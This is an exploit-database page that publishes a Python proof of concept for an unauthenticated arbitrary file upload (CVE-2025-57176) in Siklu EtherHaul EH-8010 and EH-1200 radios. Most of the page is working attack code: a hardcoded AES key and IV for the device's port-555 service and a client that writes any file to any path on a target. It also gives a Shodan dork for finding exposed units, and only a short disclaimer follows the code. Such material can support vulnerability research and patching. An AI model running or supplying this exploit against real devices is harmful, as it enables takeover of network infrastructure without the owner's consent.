Skip to main content

Siklu EtherHaul Series EH-8010 – Arbitrary File Upload

Categories: WebApps

Siklu EtherHaul Series EH-8010 – Arbitrary File Upload

Proof of Concept (PoC)

poc.py
# Exploit Title: Siklu EtherHaul Series - Unauthenticated Arbitrary File Upload
# Shodan Dork: "EH-8010" or "EH-1200"
# Date: 2025-08-02
# Exploit Author: semaja2 - Andrew James <[email protected]>
# Vendor Homepage: https://www.ceragon.com/products/siklu-by-ceragon
# Software Link: ftp://ftp.bubakov.net/siklu/
# Version:  EH-8010 and EH-1200 Firmware 7.4.0 - 10.7.3
# Tested on: Linux
# CVE: CVE-2025-57176
# Blog: https://semaja2.net/2025/08/03/siklu-eh-unauth-arbitrary-file-upload/

#!/usr/bin/env python3
import argparse, socket, struct
from Crypto.Cipher import AES

PORT = 555
HDR_LEN = 0x90
IV0 = struct.pack('<4I', 0xEA703B82, 0x75A9A17B, 0x1DFC7BB9, 0x55A24D72)
KEY = bytes([
    0x89,0xE7,0xFF,0xBE,0xEB,0x2D,0x73,0xF5,
    0xA9,0x10,0xFC,0x42,0x5B,0x1F,0x36,0x17,
    0x9F,0xB9,0x5E,0x75,0x35,0xA3,0x42,0xA0,
    0x5D,0x02,0x48,0xB1,0x19,0xD2,0x4B,0x82
])

def recv_exact(sock: socket.socket, n: int) -> bytes:
    out = bytearray()
    while len(out) < n:
        chunk = sock.recv(n - len(out))
        if not chunk:
            raise ConnectionError('socket closed')
        out += chunk
    return bytes(out)

def pad16_zero(b: bytes) -> bytes:
    r = len(b) & 0x0F
    return b if r == 0 else (b + b'x00' * (16 - r))

def hdr_checksum(hdr: bytes) -> int:
    return (sum(hdr[0:0x0C]) + sum(hdr[0x10:HDR_LEN])) & 0xFFFFFFFF

def build_header(flag: int, msg: int, payload_len: int, path: bytes) -> bytes:
    hdr = bytearray(HDR_LEN)
    hdr[0] = flag & 0xFF
    hdr[1] = msg & 0xFF
    struct.pack_into('<I', hdr, 0x08, payload_len & 0xFFFFFFFF)
    p = path if path.endswith(b'x00') else (path + b'x00')
    max_path = HDR_LEN - 0x10
    hdr[0x10:0x10 + min(len(p), max_path)] = p[:max_path]
    struct.pack_into('<I', hdr, 0x0C, hdr_checksum(hdr))
    return bytes(hdr)

class RFPipeSession:
    def __init__(self, key: bytes, iv0: bytes):
        self.key = key
        self.send_iv = iv0
        self.recv_iv = iv0
    def enc_send(self, sock: socket.socket, data: bytes) -> None:
        cipher = AES.new(self.key, AES.MODE_CBC, iv=self.send_iv)
        ct = cipher.encrypt(data)
        self.send_iv = ct[-16:]
        sock.sendall(ct)
    def dec_recv(self, sock: socket.socket, n_plain: int) -> bytes:
        if n_plain <= 0:
            return b''
        n_padded = (n_plain + 15) & ~15
        ct = recv_exact(sock, n_padded)
        cipher = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv)
        pt = cipher.decrypt(ct)
        self.recv_iv = ct[-16:]
        return pt[:n_plain]
    def send_header(self, sock: socket.socket, hdr_plain: bytes) -> None:
        if len(hdr_plain) != HDR_LEN:
            raise ValueError('header must be 0x90 bytes')
        self.enc_send(sock, hdr_plain)
    def recv_header(self, sock: socket.socket) -> bytes:
        ct = recv_exact(sock, HDR_LEN)
        cipher = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv)
        pt = cipher.decrypt(ct)
        self.recv_iv = ct[-16:]
        return pt

def connect_any(host: str, port: int) -> socket.socket:
    infos = socket.getaddrinfo(host, port, socket.AF_UNSPEC, socket.SOCK_STREAM)
    last_err = None
    for fam, st, proto, _, sa in infos:
        s = socket.socket(fam, st, proto)
        try:
            s.connect(sa)
            return s
        except Exception as e:
            last_err = e
            s.close()
    raise ConnectionError(f'connect failed: {last_err}')

def main():
    ap = argparse.ArgumentParser(description='rfpiped file upload client (msg 0x04)')
    ap.add_argument('target', help='IPv4/IPv6 address')
    ap.add_argument('--path', required=True, help='remote path string for header+0x10 (NUL will be appended)')
    ap.add_argument('--file', required=True, help='local file to send as payload')
    ap.add_argument('--recv', action='store_true', help='receive and print server ACK/response')
    args = ap.parse_args()

    with open(args.file, 'rb') as f:
        payload = f.read()
    path_bytes = args.path.encode('utf-8')
    hdr_plain = build_header(flag=0x00, msg=0x04, payload_len=len(payload), path=path_bytes)

    sess = RFPipeSession(KEY, IV0)
    with connect_any(args.target, PORT) as s:
        sess.send_header(s, hdr_plain)
        if payload:
            sess.enc_send(s, pad16_zero(payload))
        if args.recv:
            rh = sess.recv_header(s)
            flag = rh[0]; rmsg = rh[1]
            rlen = struct.unpack_from('<I', rh, 0x08)[0]
            print(f'Response: flag=0x{flag:02x} msg=0x{rmsg:02x} length={rlen}')
            if rmsg in (0x03, 0x05):
                return
            if rlen:
                body = sess.dec_recv(s, rlen)
                if body.endswith(b'x00'):
                    body = body[:-1]
                try:
                    print(body.decode('utf-8', errors='replace'))
                except Exception:
                    print(body.hex())

if __name__ == '__main__':
    main()

Security Disclaimer

This exploit is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal and may result in severe legal consequences. Always ensure you have explicit permission before testing vulnerabilities.

sh3llz@loading:~$
Loading security modules...